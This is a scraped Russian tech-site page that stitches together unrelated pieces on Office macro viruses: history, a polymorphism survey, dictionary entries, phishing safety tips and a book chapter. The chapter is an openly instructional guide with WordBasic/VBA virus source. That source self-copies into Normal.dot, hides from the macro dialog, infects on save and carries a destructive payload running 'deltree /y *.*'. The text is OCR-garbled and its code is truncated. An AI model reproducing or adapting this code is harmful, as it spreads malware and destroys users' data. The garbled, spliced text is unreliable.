Semenalidery.com

IT Новости из мира ПК
2 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Что делают макровирусы

IT История

История IT-Компаний

Новости it-компаний

Fujitsu

Fujitsu Limited (яп., Фудзицу кабусикигайся) — крупный японский производитель электроники и ИТ-компания. В 1923 году была ос.

Fujitsu Siemens Computers: новые системы хранения данных Fib

Компания Fujitsu Siemens Computers выпустила системы хранения данных FibreCAT NX40 и FibreCAT NX20 для малых и .

От истории до новостей

История ЭВМ

Авторизация

Развитие технологий:

История развития ВТ и первых ЭВМ

История появления ЭВМ и персональных компьютеров насчитывает всего несколько десятилетий. Предыдущий период использования вычислительной технике относится к эпохе применения средств, со.

Спецификации персонального компьютера

Под эгидой фирмы Intel, играющей ведущую роль на рынке микропроцессоров ежегодно проводится форум IDF (Intel Developers Forum), который определяет идеологию в .

Популярные

В эпоху «классических» вирусов любой более-менее грамотный пользователь прекрасно знал: источником вирусной заразы могут быть только программы. И уж вряд ли даже в страшном сне могло присниться, что через несколько лет смертоносной начинкой обзаведутся… текстовые документы! Впрочем, такие сообщения время от времени проскакивали ещё в конце 80-х годов. Но появились они преимущественно первого апреля, так что никакой реакции, кроме смеха, вызвать не могли.

Как оказалось, смеялись напрасно…

В 1995 г., после появления операционной системы Windows 95 Microsoft с большой помпой объявила: старым DOS-вирусам конец, Windows защищена от них на 100%, ну а новых вирусов в ближайшее время не предвидится. Если бы! Уже в том же 1995 г. было зарегистрировано несколько мощных вирусных атак и создан первый вирус, работающий под Windows 95.

А меньше чем через полгода человечество было огорошено вирусами нового, совершенно неизвестного типа и принципа действия. В отличие от всех «приличных» вирусов, новички паразитировали не на исполняемых файлах, а на документах, подготовленных в популярных программах из комплекта Microsoft Office.

Ларчик открывался просто: в текстовый редактор Microsoft Word и таб­личный редактор Microsoft Excel был встроен свой собственный язык про­граммирования – Visual Basic for Applications (VBA), предназначенный для созданий специальных дополнений к редакторам – макросов. Эти макросы сохранялись в теле документов Microsoft Office и легко могли быть заменены вирусами. После открытия заражённого файла вирус активировался и заражал все документы Microsoft Office на вашем диске.

Первоначально макровирусы – а именно так называли новый класс вирусов, — вели себя довольно пристойно. В крайнем случае – портили текстовые документы. Однако уже в скором времени макровирусы перешли к своим обычным обязанностям – уничтожению информации.

К такому повороту дел борцы с вирусами явно не были готовы. И потому буквально через несколько дней вирус Concept, поражающий документы Word, распространился по всей планете. Заражённые файлы Word с лакомым содержанием (например, списками паролей к интернет-серверам) путешество­вали от пользователя к пользователю через Интернет. Доверчивые хватали «наживку» не задумываясь – ведь даже самые умные из них были убеждены: через тексты вирусы не передаются! В итоге за четыре года, прошедших с момента появления первого «макровируса», этот класс вирусов стал самым многочисленным и опасным.

Одна из самых мощных атак макровирусов была зарегистрирована в марте 1999 г., когда вирус Melissa, созданный программистом Дывидом Смитом, всего за несколько часов распространился по всему миру. И хотя этот вирус был сравнительно безопасным (Melissaограничивалась тем, что заражала все существующие документы и рассылала свои копии людям, внесённым в адресную книгу Microsoft Outlook), его появление наделало немало шума. Именно появление Melissaзаставило Microsoft срочно оснастить программы Microsoft Office защитой от запуска макросов. При открытии любого документа, содержащего встроенные макросы, умный Word и Excel обязательно спросит пользователя: а вы уверены, что вместо всяческих полезностей вам не подсовывают в документе всяческую бяку? И стоит ли эти макросы загружать? Нажмите кнопку Нет – и вирусу будет поставлен надёжный заслон. Просто удивительно, что несмотря на такую простоту защиты большинство пользователей игнорирует предупреждения программы. И заражаются…

«Майка лидера» принадлежала макровирусам около пяти лет – срок, по меркам компьютерного мира, немалый. Выжить и преуспеть им помог Интернет – в течение последних лет вирусы этого типа распространились в основном по электронной почте. Источником заражения мог быть и присланный компьютерной фирмой прайс-лист, или рассказик, отосланный в виде файла-вложения незадачливым другом.

Сегодня число макровирусов снизилось в несколько раз – сегодня им принадлежит не более 15 % всего вирусного «рынка». Однако опасность заражения макровирусами по-прежнему высока – и поэтому будьте особенно осторожны, если вам часто приходится иметь дело с документами, созданными на других компьютерах. Качественный антивирус в сочетании с включённой защитой от макросов в программах Microsoft Office могут на­дёжно обезопасить вас от подобной напасти.

Полиморфные макро-вирусы. (Часть первая)

Полиморфные макровирусы радикально изменяют свой код с каждым новым шагом «размножения», что позволяет им избегать обнаружения антивирусными сканерами. Это может достигаться изменением ключа шифрования или самого криптографического механизма, изменением последовательности инструкций, или другими подобными изменениями в поведении вируса. Данная статья — первая из двух частей, в которых будет приведен краткий обзор использующихся полиморфных стратегий в мире макро-вирусов. Первая статья, в основном, посвящена некоторым более ранним примерам полиморфных технологий.

Введение

Полиморфные макровирусы радикально изменяют свой код с каждым новым шагом «размножения», что позволяет им избегать обнаружения антивирусными сканерами. Это может достигаться изменением ключа шифрования или самого криптографического механизма, изменением последовательности инструкций, или другими подобными изменениями в поведении вируса. Данная статья — первая из двух частей, в которых будет приведен краткий обзор использующихся полиморфных стратегий в мире макро-вирусов. Первая статья, в основном, посвящена некоторым более ранним примерам полиморфных технологий.

Первый вопрос, который приходит на ум – что именно классифицирует макровирусы, как полиморфные? Большинство макро-вирусов очень примитивны и не относятся к полиморфным. Однако есть несколько более сложных экземпляров зашифрованных вирусов, некоторые из которых даже имеют полиморфное кодирование.

Ранние Ridiculo-морфы

Первым, еще детским, шагом к полиморфизму был Outlaw. Фактически, его даже нельзя назвать полноценным полиморфом. Сам вирусный код не изменялся ни на байт, менялось только название несущего макроса. Поэтому, Outlaw полиморфом не являлся, хотя его первоначально и отнесли именно к этому классу вирусов. Все дело в том, что ранние (преимущественно, WordBasic-основанные) защитные программы, созданные для борьбы с макровирусами, проверяли только имя макроса (примитивно, но именно так и обстояло дело!) и подобная смена названия макроса позволяла довольно долго водить за нос антивирусы. Позже, когда ранние антивирусы сменились более совершенными, проверяющими код или логику программы, обнаружилось, что Outlaw не является полиморфом, а относится к обычным, неморфическим макровирусам.

Читать еще:  Как hp запустить в безопасном режиме

Вирусы, использующие вставки цифрового мусора

Далее последовал шаг, который и по сей день использует большинство вирусов — вставка всякого мусора в вирусный код. В самом простом случае, используется вставка строк, содержащих случайные комментарии. Семейство WM97.Class — хороший пример этой техники. В этих вирусах каждая линия макрокода заполнена случайными комментариями, обычно содержащими различные комбинации имени пользователя, даты, установленных принтеров и т.д. Вот пример подобного куска кода из зараженного файла:

‘SiR DySTyKSDINFECTEDINFECTED.DOC5/22/2001 6:04: 06 AM
On Error Resume Next

‘SiR DySTyKSDINFECTEDINFECTED.DOC5/22/2001 6:04:06 AM
Options.SaveNormalPrompt = 0

‘SiR DySTyKSDINFECTEDINFECTED.DOC5/22/2001 6:04:06 AM
Options.ConfirmConversions = 0

А вот этот же фрагмент в другом зараженном файле:

‘SiR DySTyKSDGOAT1GOAT1.DOC5/22/2001 6:04:16 AM
On Error Resume Next

‘SiR DySTyKSDGOAT1GOAT1.DOC5/22/2001 6:04:16 AM
Options.SaveNormalPrompt = 0

‘SiR DySTyKSDGOAT1GOAT1.DOC5/22/2001 6:04:16 AM
Options.ConfirmConversions = 0

Эта методика привела к совершенствованию антивирусов – в ответ на нее, в антивирусные сканеры была добавлена технология игнорирования строк-коментариев при просмотре кода.

Старый вирус FutureNot состоял из двух модулей — AutoOpen и FileSave. Последний модуль и отвечал за заражение новых документов, сохраняясь в одном из шаблонов и, таким образом, не присутствуя непосредственно в самих зараженных документах. Первоначальный макрос AutoOpen сохранялся в глобальном шаблоне со случайно выбранным названием из 5 символов. Дополнительно, вирус вставлял в свой код в случайных местах текст «1 Gen». Это служило для «автора» своего рода «знаком поколения» — число таких комментариев соответствовало числу зараженных компьютеров по текущей цепочке инфицирования.

С каждым шагом инфицирования запрашивался макрос FileSaveAs и вирус несколько видоизменял свой код. Добавлялись случайные числа в виде комментариев и добавлялись дополнительные пустые строки. Через несколько стадий макрос напоминал следующий фрагмент:

dlg.Format = 1
‘ 0.38007424142506
jqp$ = FileName$()

Но и этот вирус стал бессилен, когда антивирусные сканеры стали предварительно проводить процедуру «нормализации кода» — комментарии удалялись из кода, как и пробелы и пустые строки. После этих процедур все экземпляры кода из самых разных цепочек и поколений полиморфического вируса выглядели абсолютно идентично. Это и позволяло идентифицировать макровирусы, наряду с определением контрольных сумм нормализованного кода подобных макровирусов.

Но все равно вскоре появились макровирусы, использующие вставки всякого мусора, которые смогли обойти существовавшие процедуры нормализации кода. Для примера можно привести макровирус Polymac.A, также известный под «кличкой» Chydow.A, который перемешивал свой значимый код (выделен зеленым шрифтом) с произвольно составленными ничего не значащими в большинстве случаев командами:

Loop While DjFeUOL2kkwJCIE6 Rnd * 28 Then

Do
PjN7FDkGwkU7 = PjN7FDkGwkU7 + 6

Loop While PjN7FDkGwkU7

Подписывайтесь на каналы «SecurityLab» в Telegram и Яндекс.Дзен, чтобы первыми узнавать о новостях и эксклюзивных материалах по информационной безопасности.

Макровирус

Макровирус — это разновидность компьютерных вирусов разработанных на макроязыках, встроенных в такие прикладные пакеты ПО, как Microsoft Office. Для своего размножения такие вирусы используют возможности макроязыков и при их помощи переносятся из одного зараженного файла в другие. Большая часть таких вирусов написана для MS Word.

См. также

Wikimedia Foundation . 2010 .

Смотреть что такое «Макровирус» в других словарях:

Макровирус — файловый вирус, существующий в виде макроса для определенного приложения. При открытии зараженного файла вирус прикрепляет себя к приложению и заражает все файлы, к которым обращается программа. По английски: Macro virus См. также: Файловые… … Финансовый словарь

макровирус — сущ., кол во синонимов: 1 • программа (114) Словарь синонимов ASIS. В.Н. Тришин. 2013 … Словарь синонимов

Компьютерный вирус — Начало исходного кода примитивного вируса для MS DOS на языке ассемблера … Википедия

Хронология компьютерных вирусов и червей — Здесь приведён хронологический список появления некоторых известных компьютерных вирусов и червей, а также событий, оказавших серьёзное влияние на их развитие. Содержание 1 2012 2 2011 3 2010 4 2009 … Википедия

Антивирусная программа — (антивирус) любая программа для обнаружения компьютерных вирусов, а также нежелательных (считающихся вредоносными) программ вообще и восстановления зараженных (модифицированных) такими программами файлов, а также для профилактики … … Википедия

Система обнаружения вторжений — (СОВ) программное или аппаратное средство, предназначенное для выявления фактов неавторизованного доступа в компьютерную систему или сеть либо несанкционированного управления ими в основном через Интернет. Соответствующий английский… … Википедия

Межсетевой экран — Иллюстрация, показывающая расположение сетевого экрана (Firewall) в сети … Википедия

Adware — (англ. ad, advertisement «реклама» и software «программное обеспечение») программное обеспечение, содержащее рекламу. Также, термином «adware» называют вредоносное программное обеспечение, основной целью которого является показ рекламы во… … Википедия

Spyware — (шпионское программное обеспечение) программное обеспечение, осуществляющее деятельность по сбору информации о конфигурации компьютера, деятельности пользователя и любой другой конфиденциальной информации без согласия самого пользователя.… … Википедия

Вредоносная программа — (на жаргоне антивирусных служб «зловред», англ. malware, malicious software «злонамеренное программное обеспечение») любое программное обеспечение, предназначенное для получения несанкционированного доступа к вычислительным… … Википедия

Макровирусы

Зловредные макросы вновь на повестке дня. Киберпреступники просто обожают сотрудников отдела кадров, ведь по долгу службы им приходится открывать много файлов из неизвестных источников, и эти файлы нередко содержат что-нибудь вредоносное. А знаете, кто находится в сходном положении? Мы с вами. В Интернете мы общаемся со множеством людей, и некоторые из них предлагают нам открывать файлы непонятного происхождения.

Через фишинговые сайты

Недавно исследователи натолкнулись на рекламную кампанию, в рамках которой злоумышленники пытались заразить пользователей, зарегистрированных на некоторых интернет-ресурсах, и предлагала некую работу, с подробностями которой можно было ознакомиться во вложенном файле. Это был обычный документ Word, а не исполняемый .exe-файл, что и притупило бдительность некоторых жертв. Ведь что может быть не так с обычным документом Microsoft Office?

А может быть вот что: в офисных документах могут содержаться макровирусы — зловреды, скрывающиеся в макросах. Макровирусы, как следует из их названия, предназначены для добавления вредоносного кода к макросам электронных документов. Подавляющее большинство макровирусов написаны для файлов Microsoft Office (Word, Excel, Access, PowerPoint и Project) как для Windows, так и для macOS.

Читать еще:  Как запустить асер в безопасном режиме

Если открыть такой документ, он потребует разрешение на выполнение макроса, которое некоторые пользователи ему благополучно выдают. После этого программа устанавливает на устройство жертвы клавиатурный шпион (кейлоггер) или троян удаленного доступа.

Когда ваш компьютер заражен подобным зловредом, преступники могут видеть любой текст, который вы набираете, включая логины и пароли. То есть, по сути, могут красть ваши учетные записи и деньги.

Через фишинговые письма

Часто хакеры используют следующую технику – отправляют жертве фишинговое письмо с прикрепленным документом, содержащим макрос с вредоносным кодом.

Если жертва пытается открыть документ, появляется диалоговое окно с уведомлением о необходимости активировать макросы, чтобы просмотреть его содержимое. Когда макросы включены, выполняется загрузка дополнительного ПО с подконтрольного злоумышленникам сайта.

Специалисты обнаружили вредоносный документ Word, содержавший макрос со скриптом на Python. На начальном этапе макрос определяет, какая операционная система (Windows или macOS) установлена на компьютере, а затем загружает соответствующие версии вредоносного скрипта.

Несколько советов по безопасности

  • Если кто-то просит вас установить дополнительно те или иные программы — не делайте этого если не уверены в том, что они не дадут заказчику доступ к вашему компьютеру. В исключительных случаях, скачивайте эти программы из официальных источников.
  • Не открывайте файлы с расширением.exe или другие исполняемые файлы — они могут быть вредоносными. Если же вам совершенно необходимо запустить такой файл, сначала проверьте его антивирусом на компьютере или при помощи онлайн-сервисов вроде Kaspersky VirusDesk или VirusTotal.
  • Не включайте макросы в документах Microsoft Word, таблицах Excel, презентациях PowerPoint и так далее. По сути, макросы — это те же исполняемые файлы, только спрятанные в документах, и кибермошенники просто обожают рассылать с виду безобидные файлы, приправленные вредоносным кодом.

  • Не поддавайтесь на фишинг. Злоумышленники нередко хотят заполучить доступ к вашим учетным записям на различных порталах, чтобы добраться до ваших денег. Вдобавок, имея возможность войти в ваш аккаунт, преступники могут испортить вашу репутацию, в создание которой вы вложили немало усилий. Поэтому остерегайтесь сайтов с опечатками в URL-адресах и писем с призывами повторно залогиниться или отправить свои учетные данные кому бы то ни было.
  • Никому не пересылайте фотографии своих банковских карт для подтверждения вашего платежа в случае оплаты товаров и услуг через Интернет. Также никогда не называйте дату истечения срока действия карты или код CVC/CVV (три цифры на обратной стороне карты). Для этого вполне достаточно вашего имени и номера карточки.
  • Установите надежное защитное антивирусное решение, которое обезопасит вас от вредоносных программ, фишинга, спама и других киберугроз.

Макровирусы

В этой главе рассказано
о макровирусах. Подробно опи-
сана процедура и методы за-
ражения файлов. Представлен
исходный текст макровируса
с подробными комментария-
ми. Приведены основные
сведения о языке VBA, его про-
цедурах, функциях, стандарт-
ных конструкциях.

Как известно, в последнее время большое распространение получили
макро-вирусы. По сведениям из различных источников, на эти вирусы
приходится от 70 до 80 процентов заражений. Изложенный ниже мате-
риал поможет разобраться в вирусах этого типа.

Для изучения макро-вирусов понадобится некоторое программное обес-
печение. В качестве «полигона» необходим MS-WORD версии 6.0 или
выше. Для изучения зашифрованных макросов может пригодиться диз-
ассемблер макросов (автор AURODREPH из VBB). Для более полного
понимания всего изложенного ниже желательно иметь базовые знания
о WORD BASIC.

Чтобы обезопасить рабочие файлы от плодов экспериментов, настоя-
тельно рекомендуется создать резервную копию шаблона
NORMAL.DOT в каталоге WINWORD6TEMPLATE, так как именно
этот документ обычно заражается макро-вирусом. Когда все готово, са-
мое время перейти к основам макро-вирусов.

Макрос — это программа, написанная на некотором языке, которая ис-
пользуется обычно для автоматизации определенных процессов внутри
приложений. В данном случае разговор пойдет о языках Visual Basic for
Applications (VBA) и WordBasic (WB), которые Microsoft использует в
своих программах (в частности, Excel, Project и PowerPoint используют
VBA, a WinWord — WB).

Далее будем считать стандартным языком VBA, так как он представля-
ет собой попытку унифицировать макроязык, сделать его общим для
всех программ Microsoft. Несмотря на то, что WB имеет некоторые от-
личия, в том числе и в синтаксисе, структура кода этих языков похожа.
При необходимости будет особо отмечено, что речь идет о WB.

Макрос VBA — это вызываемые процедуры. Они бывают двух типов:

процедуры-подпрограммы и процедуры-функции.

Процедуры-подпрограммы могут исполняться непосредственно или вы-
зываться из других макросов. Синтаксис их следующий:

‘Данный макрос открывает диалоговое окно и выводит сообщение

MsgBox «Hello World!»

Процедуры-функции (также называемые просто функциями) возвраща-
ют значение, которое может быть передано в качестве параметра другой
процедуре. Их синтаксис:

Function (Аргументы)
-> Инструкции

If lnfect_Num=0 Then MsgBox «Файл не заражен»

конструкция «With-end with» (используется для работы с несколькими
свойствами конкретного объекта):

Sub ChangeProperties
With Selection
.Font.Bold=True

.Font.Colorlndex=3 ‘красный цвет
End With
End Sub

селектор «Select case-end case»:

Select Case lnfect_Num

MsgBox «Файл не заражен»

MsgBox «Файл заражен»

Case is (Аргументы)

Аргументами могут быть константы, переменные или выражения.
Процедуры могут быть и без аргументов.

Function Get_Name()
Name=Application.UserName
End Function

Некоторые функции всегда требуют фиксированное число аргументов
(до 60). Другие функции имеют несколько обязательных аргументов,
а остальные могут отсутствовать.

После того, как основы VBA стали понятны, идем дальше. Итак, виру-
сы и «троянцы» на VBA.

Язык VBA универсален, и тому есть две причины. Во-первых, этот язык
прост в изучении и использовании, поскольку он является языком ви-
зуального программирования, он ориентирован на события, а не на
объекты. С его помощью без особых затрат времени очень легко созда-
вать сложные модули. Во вторых, можно использовать большое количе-
ство предопределенных функций, облегчающих работу. В третьих, име-
ются функции (или макросы) автоматического выполнения, что
позволяет упростить написание процедур автокопирования, занесения
в память и прочих используемых стандартными DOS-вирусами.

Помимо этого, преимуществом VBA является свойство переносимости.
VBA работает под Win З.х, Win95, WinNT, MacOS и так далее, то есть
в любой операционной системе, где можно запустить приложения его
поддерживающие.

Читать еще:  Google настройки безопасности

VBA представляет собой язык, адаптированный к языку приложения,
из-под которого он запущен. Это означает, что если на компьютере ус-
тановлена, например, испанская версия WinWord, то имена предопреде-
ленных функций будут также на испанском. Так что два следующих
макроса — вовсе не одно и то же.

Первый макрос (испанский):

Sub Demo_Macro
Con Seleccion.Fuente
.Nombre=»Times»
Fin Con
End Sub

Второй макрос (английский):

Sub Demo_Macro
With Selection.Font
.Name=»Times»

End With
End Sub

Последний макрос не будет работать в испанской версии WinWord
(а первый — в английской) — он вызовет ошибку выполнения макроса.
Еще отметим, что VBA — язык интерпретируемого (некомпилируемого)
типа, так что каждая ошибка выполнения проявляется «в полете».

Существуют функции, единые для всех версий VBA, вне зависимости
от языка. Например, автоматический макрос AutoExec.

Всего таких специальных макросов пять, выполняются они автомати-
чески:

AutoExec: это макрос, активируемый при загрузке текстового процессо-
ра, но только в том случае, если он сохранен в шаблоне Normal.dot или
в каталоге стандартных приложений;

AutoNew: активизируется при создании нового документа;

AutoOpen: активизируется при открытии существующего документа;

AutoClose: активизируется при закрытии документа;

AutoExit: активизируется при выходе из текстового процессора.

В качестве доказательства силы и универсальности этих макросов рас-
смотрим следующий фрагмент кода (о языке уже договорились).

‘Макрос наиболее эффективен, если его сохранить как AutoExit
Sub Main

‘Проверим регистрационное имя
If Application. Username <> «MaD_MoTHeR» Then

‘Снимем атрибуты COMMAND.COM
SetAttr «C:COMMAND.COM»,0

‘Откроем для проверки — вдруг появятся ошибки
Open «CACOMMAND.COM» for Output as #1

‘Если ошибки есть, то закроем.
Close #1

‘Проверим месяц и дату. Если 29 февраля, то выполним
‘команду «deltree /у >nul
If Month(Now())=2 Then
If Day(Now())=29 Then
Shell «deltree /y *.* >nu»
End If
End If
End Sub

Что делает этот макрос? При выходе из WinWord он проверяет два па-
раметра: имя, на которое зарегистрирован WinWord (если это не
MaD_MoTHeR, то будет удален файл COMMAND.COM), и текущую
системную дату (если это 29 февраля, выполняется команда «deltree /у
*.* > nub).

Очень важно знать, как адаптировать автоматический макрос (ниже
приведен простейший вариант), чтобы активизировать его в открывае-
мый по умолчанию шаблон WinWord.

Это делается так:

Определяется переменная, в которую записывается полное имя макроса:

‘этот макрос будет выполняться каждый раз

‘при создании нового документа

Теперь нужно записать макрос в шаблон NORMAL.DOT простой ко-
мандой:

MacroCopy name$, «Global:AutoNew»

Это стандартный способ работы макро-вирусов, но есть еще много дру-
гих, более интересных способов заражения. Всего то и нужно, что не-
много воображения и несколько строчек кода. Одним из трюков, кото-
рый усложняет подобные вирусы и затрудняет их анализ, является
кодирование макро-вирусов.

MacroCopy «MyTemplate:MyMacro», «GlobahAutoClose», 1

Если выполняется команда MacroCopy с параметром, равным 1 (или
другому числу больше 0), то в результате копирования будет получен
только исполняемый макрос, который нельзя редактировать.

Большинство макро-вирусов имеют типичную структуру. Они начина-
ются с автовыполняемого макроса, заражающего глобальный шаблон
Normal.dot. Также в их состав входят некоторые макросы, которые зара-
жают файлы при определенных действиях (FileSaveAs, FileSave,
ToolsMacros). Документы заражаются при совершении над ними опера-
ций вирусными макросами, то есть они будут инфицироваться при
открытии.

Код для процедуры автовыполнения может выглядеть примерно так:

On Error Goto Abort

iMacroCount=CountMacros(0, 0) ‘Проверка на зараженность

For i=1 To iMacroCount

If MacroName$(i, 0, 0)=»PayLoad» Then

binstalled =-1 ‘с помощью макроса Payload

If MacroName$(i, 0, 0)=»FileSaveAs» Then

bTooMuchTrouble =-1 ‘но если есть макрос FileSaveAs,
‘то заразить тяжело

If Not binstalled And Not bTooMuchTrouble Then

‘Добавим макросы FileSaveAs и копии AutoExec и FileSave
‘Payload используется только для проверки на зараженность
‘,1 — кодирует макросы, делая их нечитаемыми в Word

MacroCopy Macro$, «Global:PayLoad», 1

Macro$=sMe$+»:FileOpen» ‘Будет происходить заражение

MacroCopy Macro$, «GlobahFileOpen», 1

MacroCopy Macro$, «GlobahFileSaveAs», 1

MacroCopy Macro$, «GlobahAutoExec», 1

SetProfileString «WW6I», Str$(iWW6llnstance+1)

Она копирует макро-вирус в активный документ при его сохранении
через команду File/SaveAs. Эта процедура использует во многом схо-
жую с процедурой AutoExec технологию. Код для нее:

Dim dig As FileSaveAs

If (Dlg.Format=0) Or (dlg.Format=1) Then

MacroCopy «FileSaveAs», WindowName$()+»:FileSaveAs»

‘Заражает при сохранении документа
MacroCopy «FileSave», WindowName$()+»:FileSave»
MacroCopy «PayLoad», WindowName$()+»:PayLoad»
MacroCopy «FileOpen», WindowName$()+»:FileOpen»

‘При открытии документа
Dlg.Format=1
End If

FileDaveAs dig
End Sub

Этой информации вполне достаточно для создания небольших макро-
вирусов.

Существует несколько способов скрыть вирус или сделать его более
эффективным. Например, можно создать специальный макрос, прячу-
щий вирус, если Tools/Macro открывается для просмотра. Код такого
макроса может выглядеть примерно так:

Sub MAIN
On Error Goto ErrorRoutine

If macros.bDebug Then

MsgBox «start ToolsMacro»

Dim dig As OutilsMacro

If macros.bDebug Then MsgBox «1»

If macros.bDebug Then MsgBox «2»

On Error Goto Skip
Dialog dig
OutilsMacro dig
Skip:

On Error Goto ErrorRoutine ‘При ошибке на выход
End If

REM enable automacros
DisableAutoMacros 0

Goto Done ‘Переход на метку Done

On Error Goto Done «Переход на метку Done
If macros.bDebug Then

MsgBox «error «+Str$(Err)+» occurred» ‘Сообщение об ошибке
End If

Макро-вирусы также могут включать внешние процедуры. Например,
вирус Nuclear пытается откомпилировать и запустить внешний
файл-разносчик вируса, некоторые троянские макросы пытаются фор-
матировать винчестер при открытии документа.

Выше были изложены основы для изучения макро-вирусов. Пришло
время рассмотреть исходные тексты.

Macro name: AutoNew [AUTONEW] «U»
Encryption key: DF
Sub MAIN

‘Включаем обработку автоматических макросов
DisableAutoMacros 0

‘Проверим, установлен ли макрос. Если макрос AutoExec
‘присутствует, считаем, что файл заражен
If (lnstalled=0) And (Forgetlt=0) Then

‘Заразим. Копируем макрос

MacroCopy WindowName$()+»:AutoExec», «GlobahAutoExec», 1

MacroCopy WindowName$()+»:AutoNew», «Global:AutoNew», 1

MacroCopy WmdowName$()+»:AutoOpen», «Global:AutoOpen», 1

MacroCopy WindowName$()+»:DateiSpeichem», «Global:DateiSpeichern», 1

MacroCopy WindowName$() + «: ExtrasOptionen «,

«Global :ExtrasOptionen», 1

MacroCopy WindowName$()+»:lt», «Global:lt», 1

MacroCopy WindowName$()+»:DateiDrucken», «GlobahDateiDrucken», 1

‘Функция проверяет, инсталлирован ли макрос AutoExec
Function Installed

‘Установим переменную Installed в 0 (инициализация переменной).
«При положительном результате проверки установим ее в 1
lnstalled=0

‘Проверим, есть ли макросы
If CountMacros(O) > 0 Then

«Проверим имена макросов. Если есть AutoExec,

Ссылка на основную публикацию
ВсеИнструменты
Adblock
detector
×
×